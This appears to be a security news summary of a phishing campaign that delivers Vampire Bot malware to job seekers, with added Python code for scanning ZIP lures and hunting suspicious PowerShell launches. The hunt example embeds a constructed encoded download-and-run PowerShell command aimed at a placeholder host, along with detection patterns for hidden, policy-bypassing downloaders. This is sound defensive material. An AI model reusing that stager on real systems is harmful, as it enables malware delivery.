Vampire Bot Malware Sinks Fangs Into Job Hunters


Summary

A Vietnam-based threat group tracked as BatShadow has been running a phishing campaign aimed at job seekers and digital marketing professionals. The attackers send ZIP archives that bundle a lure PDF with a concealed malicious executable; when a victim launches the file, a decoy PDF is displayed while PowerShell scripts silently install Vampire Bot.

Vampire Bot, written in Go, provides persistent surveillance: it takes periodic screenshots (compressed to WebP), harvests system metadata, hides its files in system folders, and communicates with a command-and-control (C2) server to receive commands or additional payloads. Aryaka Threat Research Labs documented these behaviours and linked the campaign to a broader trend of Vietnamese-speaking cybercrime groups using phishing and data marketplaces to monetise stolen information.

Key Points

  • Targets: job seekers and digital marketing professionals, who are more likely than most to open an unsolicited career-related file.
  • Infection vector: a ZIP archive combining a decoy PDF with a concealed malicious executable; PowerShell scripts run the payload while the decoy PDF is shown.
  • Capabilities: continuous desktop surveillance via periodic screenshots (WebP), system profiling, persistence, and C2 check-ins for remote control and additional payloads.
  • Evasion: the malware hides its files in system folders, adjusts file attributes, and may prompt users to change their default browser to sidestep native download protections.
  • Attribution and context: Aryaka links the campaign to BatShadow, one of several Vietnam-linked groups leveraging phishing and criminal marketplaces for stolen data.
  • Why it works: the campaign blends into normal-looking job workflows, which raises the chance of a successful compromise and of prolonged, unnoticed visibility into the victim's machine.

Content Summary

Researchers observed Vampire Bot distributed via social-engineering lures that imitate legitimate job or client communications. The attack sequence typically uses a ZIP archive containing a decoy PDF and a concealed executable; launching the concealed file runs PowerShell scripts that display the decoy while silently installing the malware. Once installed, Vampire Bot collects device information, takes screenshots and exfiltrates them over encrypted channels, and maintains persistence through hiding techniques and ongoing C2 communication.
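One way to screen an incoming archive for exactly this combination (a document-looking decoy shipped next to a concealed executable), as an added example rather than code from the article or from Aryaka: the archives it inspects are constructed inside the block, and the member names, attribute bits and extension lists are the author's assumptions about how such lures are packaged, not indicators taken from the page.

```python
"""
Triage a ZIP attachment for the lure pattern described above: a decoy document
shipped alongside a hidden executable. Added example, not code from the article
or from Aryaka; the archives it inspects are constructed in this file.
"""
import io
import zipfile
from pathlib import PureWindowsPath

# Extensions Windows runs directly or hands to a script host (assumed list).
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1", ".vbs",
             ".js", ".jse", ".wsf", ".hta", ".lnk", ".dll", ".msi"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".rtf"}
DOS_HIDDEN, DOS_SYSTEM = 0x02, 0x04   # MS-DOS attribute bits kept in external_attr
RLO = "\u202e"                        # right-to-left override, used to mask extensions


def inspect_zip(data: bytes) -> list[tuple[str, str]]:
    """Return (member, reason) findings; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            suffixes = [s.lower() for s in PureWindowsPath(name).suffixes]
            ext = suffixes[-1] if suffixes else ""
            with zf.open(info) as member:      # only the magic bytes are needed
                head = member.read(4)
            if RLO in name:
                findings.append((name, "right-to-left override in member name"))
            if ext in EXEC_EXTS:
                findings.append((name, f"executable extension {ext}"))
            if len(suffixes) >= 2 and suffixes[-2] in DOC_EXTS and ext in EXEC_EXTS:
                findings.append((name, "document name with trailing executable extension"))
            if head.startswith(b"MZ") and ext not in EXEC_EXTS:
                findings.append((name, f"PE header behind extension {ext or '(none)'}"))
            if info.external_attr & (DOS_HIDDEN | DOS_SYSTEM):
                findings.append((name, "hidden or system attribute set"))
    return findings


def should_block(data: bytes) -> bool:
    """Gateway policy used here: any finding blocks the attachment."""
    return bool(inspect_zip(data))


def build_zip(members: list[tuple[str, bytes, int]]) -> bytes:
    """Build a constructed archive from (name, content, DOS attribute bits) triples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content, attrs in members:
            info = zipfile.ZipInfo(name)   # explicit ZipInfo so external_attr is preserved
            info.external_attr = attrs
            zf.writestr(info, content)
    return buf.getvalue()


# Constructed samples: the lure shape from the article, and a harmless archive.
LURE_ZIP = build_zip([
    ("Job_Description.pdf", b"%PDF-1.4\n% constructed decoy\n", 0),
    ("Job_Description.pdf.exe", b"MZ\x90\x00" + b"\x00" * 60, DOS_HIDDEN),
])
CLEAN_ZIP = build_zip([
    ("Job_Description.pdf", b"%PDF-1.4\n% constructed decoy\n", 0),
    ("cover_letter.txt", b"Dear hiring manager,\n", 0),
])

if __name__ == "__main__":
    for label, blob in (("lure", LURE_ZIP), ("clean", CLEAN_ZIP)):
        print(label, "BLOCK" if should_block(blob) else "allow", inspect_zip(blob))
```

The hidden-attribute check only fires when the archive carries MS-DOS attribute bits (archives built on Windows usually do; many built on Unix leave that byte zero), so the magic-byte and double-extension checks are the ones to rely on. Nested archives and password-protected ZIPs are not opened here; in a gateway both should be quarantined rather than waved through.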

The campaign demonstrates a shift where cybercriminals exploit everyday professional workflows — especially job-hunting activity — to trick users into executing malicious files. BatShadow is part of a growing set of groups operating out of Vietnam and the wider Southeast Asia region that rely on phishing and data reselling ecosystems to monetise access.

Context and Relevance

Punchy take: this isn't just another phishing run. Vampire Bot is a surveillance-focused implant that can quietly harvest extensive information from personal and work machines. For security teams, recruiters and anyone currently job hunting, the article highlights how attackers weaponise trust in recruitment and client communications to get a foothold.

The story fits into broader trends: increased use of commodity tooling by regional cybercrime groups, reliance on phishing for initial access, and marketplaces (including Telegram-based ecosystems) that sell stolen credentials and data. Organisations should treat recruitment workflows as part of their threat surface and apply targeted controls accordingly.

Why should I read this?

If you’re job hunting, hiring or running an estate with remote workers, read this. It explains the exact trick (ZIP + fake PDF + PowerShell) attackers use and what the malware actually does (silent screenshots, system profiling, C2 callbacks). Saves you time: read the highlights here, then act on the quick defensive steps below.

Quick defensive actions

  • Warn job applicants and HR teams about unsolicited ZIPs and unexpected attachments, and about any instruction to switch browsers in order to download a file.
  • Block or sandbox email attachments that contain executables; inspect ZIP contents for executables, double extensions and mismatched file types rather than filtering on the outer attachment alone.
  • Harden endpoints: constrain PowerShell (Constrained Language Mode, script block logging, AppLocker or WDAC rules for user-writable paths), enable EDR with behavioural detection, and monitor for processes that capture the screen at regular intervals and for periodic beaconing to unfamiliar hosts.
  • Keep browsers, AV/EDR and OS patches current, and educate users to treat recruitment communications cautiously.
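A hunt for the endpoint side of the chain, PowerShell started from a user-writable folder with a hidden window, a policy bypass or an encoded download command, run over process-creation events. This is an added example, not from the article: the events are constructed, the field names follow a Sysmon-style export, and because the page does not give Vampire Bot's actual command line, the flags and cmdlets matched here are an assumption about how such droppers commonly run.

```python
"""
Hunt for PowerShell launched from a user-writable path with a hidden window,
execution-policy bypass or encoded downloader, over process-creation events.
Added example; events are constructed and the matched flags are assumptions,
since the page does not quote the real Vampire Bot command line.
"""
import base64
import re

DROP_DIRS = re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop|Documents|AppData\\Local\\Temp)\\", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
POLICY_BYPASS = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOADER = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer", re.I)


def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; returns '' on malformed input instead of raising."""
    try:
        return base64.b64decode(blob).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; reasons explain the score."""
    image = event["Image"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, []
    cmd = event["CommandLine"]
    score, reasons = 0, []
    if DROP_DIRS.search(event["CurrentDirectory"]) or DROP_DIRS.search(event["ParentImage"]):
        score += 1; reasons.append("launched from user-writable path")
    if HIDDEN_WINDOW.search(cmd):
        score += 2; reasons.append("hidden window")
    if POLICY_BYPASS.search(cmd):
        score += 1; reasons.append("execution policy bypass")
    m = ENCODED_CMD.search(cmd)
    if m:
        score += 1; reasons.append("encoded command")
        if DOWNLOADER.search(decode_ps(m.group(1))):
            score += 2; reasons.append("decoded command downloads content")
    return score, reasons


def hunt(log_text: str, threshold: int = 4) -> list[tuple[str, int, list[str]]]:
    """Parse '|'-separated events (command line last, so it may contain pipes)."""
    lines = [ln for ln in log_text.splitlines() if ln.strip()]
    header = lines[0].split("|")
    alerts = []
    for line in lines[1:]:
        event = dict(zip(header, line.split("|", len(header) - 1)))
        score, reasons = classify(event)
        if score >= threshold:
            alerts.append((event["UtcTime"], score, reasons))
    return alerts


# Constructed stage-two fetch; example.invalid is a reserved placeholder domain.
_STAGER = encode_ps(r"Invoke-WebRequest -Uri http://example.invalid/s -OutFile $env:TEMP\s.exe; Start-Process $env:TEMP\s.exe")

# Constructed Sysmon-style events: one dropper, three benign PowerShell uses, one non-PowerShell.
SAMPLE_LOG = rf"""
UtcTime|Image|ParentImage|CurrentDirectory|CommandLine
2025-10-01 09:12:04|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|C:\Users\alice\Downloads\Job_Offer\|powershell.exe -w hidden -ep bypass -enc {_STAGER}
2025-10-01 09:13:10|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\svchost.exe|C:\Windows\System32\|powershell.exe -NoProfile -File C:\ProgramData\Scripts\inventory.ps1
2025-10-01 09:14:22|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\WindowsTerminal.exe|C:\Users\alice\|powershell.exe
2025-10-01 09:15:40|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|C:\Users\alice\Documents\|powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\Documents\build.ps1
2025-10-01 09:16:01|C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|C:\Users\alice\Downloads\Job_Offer\|notepad.exe Job_Description.pdf
"""

if __name__ == "__main__":
    for when, score, reasons in hunt(SAMPLE_LOG):
        print(when, score, ", ".join(reasons))
```

The scoring is deliberately additive so a developer running a local script with `-ExecutionPolicy Bypass` from Documents scores 2 and stays below the alert threshold, while the constructed dropper scores 7. Decoding `-EncodedCommand` before matching is the step most worth keeping: a detector that only looks at the outer command line sees base64 and nothing else.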

Source

Source: https://www.darkreading.com/cyberattacks-data-breaches/vampire-bot-malware-job-hunters